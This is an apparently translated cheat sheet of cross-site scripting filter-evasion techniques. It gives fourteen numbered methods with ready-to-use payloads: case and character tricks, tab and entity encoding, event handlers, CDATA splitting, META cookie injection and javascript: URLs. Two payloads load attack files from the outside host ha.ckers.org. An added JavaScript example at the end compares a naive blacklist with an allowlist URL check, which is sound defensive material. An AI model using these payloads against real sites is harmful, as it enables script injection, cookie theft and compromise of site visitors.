1. Change character case

<sCript>alert('d')</scRipT>

2. Insert extra characters to evade regular expression checks

<<script>alert('c')//<</script>
<SCRIPT a=">" SRC="t.js"></SCRIPT>
<SCRIPT =">" SRC="t.js"></SCRIPT>
<SCRIPT a=">" '' SRC="t.js"></SCRIPT>
<SCRIPT "a='>'" SRC="t.js"></SCRIPT>
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use an extension other than .js

<script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
    background-image: url('javascript:alert("XSS");')
}

5. Insert other characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>
<SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use tabs or newlines to evade

<img src="jav ascr ipt:alert('XSS3')">
<img src="jav ascr ipt:alert('XSS3')">
<IMG SRC="jav ascript:alert('XSS');">

-> tab
-> newline

7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>
<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">
<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
Source code: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
Source code: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in an swf file

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code apart and reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>

13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. JavaScript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>
<img src="javascript:alert('XSS3')">
<IMG DYNSRC="javascript:alert('XSS20')">
<IMG LOWSRC="javascript:alert('XSS21')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">
<IFRAME SRC=javascript:alert('XSS27')></IFRAME>
<TABLE BACKGROUND="javascript:alert('XSS29')">
<DIV STYLE="background-image: url(javascript:alert('XSS30'))">
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
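Sections 1, 6, 8 and 14 above all defeat filters that search for the literal string javascript: in src/href/url values. The following is an added example, not code from the original post, contrasting such a naive check with a canonicalise-then-allowlist check; naiveBlock, isSafeUrl and the sample inputs are assumed names constructed for the demonstration.

```javascript
// Added example (not from the original post): a naive "javascript:" blacklist
// beside a canonicalise-then-allowlist check for URL-bearing attributes (src,
// href, url()). Helpers and samples are constructed; CSS escapes are out of scope.
const NAIVE_RE = /javascript:/; // the kind of check the payloads above evade

// Returns true when the naive filter would let the value through.
function naiveBlock(value) {
  return !NAIVE_RE.test(value);
}

// Minimal numeric-entity decoding, mirroring what the HTML parser does to an
// attribute value before the URL is parsed. Named entities (e.g. &colon;)
// are not decoded here; isSafeUrl fails closed if one is left in the scheme.
const cp = (n) => String.fromCodePoint(Math.min(n, 0x10ffff));
function decodeNumericEntities(value) {
  return value
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)));
}

// Browsers strip ASCII tab, LF and CR anywhere in a URL, trim leading C0
// controls and spaces, and match the scheme case-insensitively. Replicate
// that first, then allow only known-good schemes instead of denying bad ones.
function isSafeUrl(rawValue) {
  const url = decodeNumericEntities(rawValue)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\x00-\x20]+/, '');
  const head = url.split(/[:\/?#]/)[0];  // candidate scheme, if any
  if (head.includes('&')) return false;  // undecoded entity in scheme: reject
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (!m) return true;                   // no scheme: relative URL
  return ['http', 'https', 'mailto'].includes(m[1].toLowerCase());
}

// Constructed samples: the variants from the sections above plus benign URLs.
const SAMPLES = [
  'jav\tascript:alert(1)',     // section 6: tab inside the scheme
  'jav\nascr\nipt:alert(1)',   // section 6: newlines
  'JaVaScRiPt:alert(1)',       // section 1: case change
  '&#106;avascript:alert(1)',  // section 8: entity-encoded first byte
  'https://example.com/a.js',  // benign absolute URL
  '/images/a.png?x=1&y=2',     // benign relative URL with a query string
];
// Returns, per sample, whether each check allowed it.
function compareChecks(samples) {
  return samples.map((s) => ({ value: s, naive: naiveBlock(s), allowlist: isSafeUrl(s) }));
}

for (const r of compareChecks(SAMPLES)) console.log(JSON.stringify(r));
```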